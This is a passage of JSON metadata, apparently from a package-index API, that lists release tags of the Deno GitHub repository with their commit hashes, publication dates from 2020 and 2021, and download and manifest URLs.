d":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0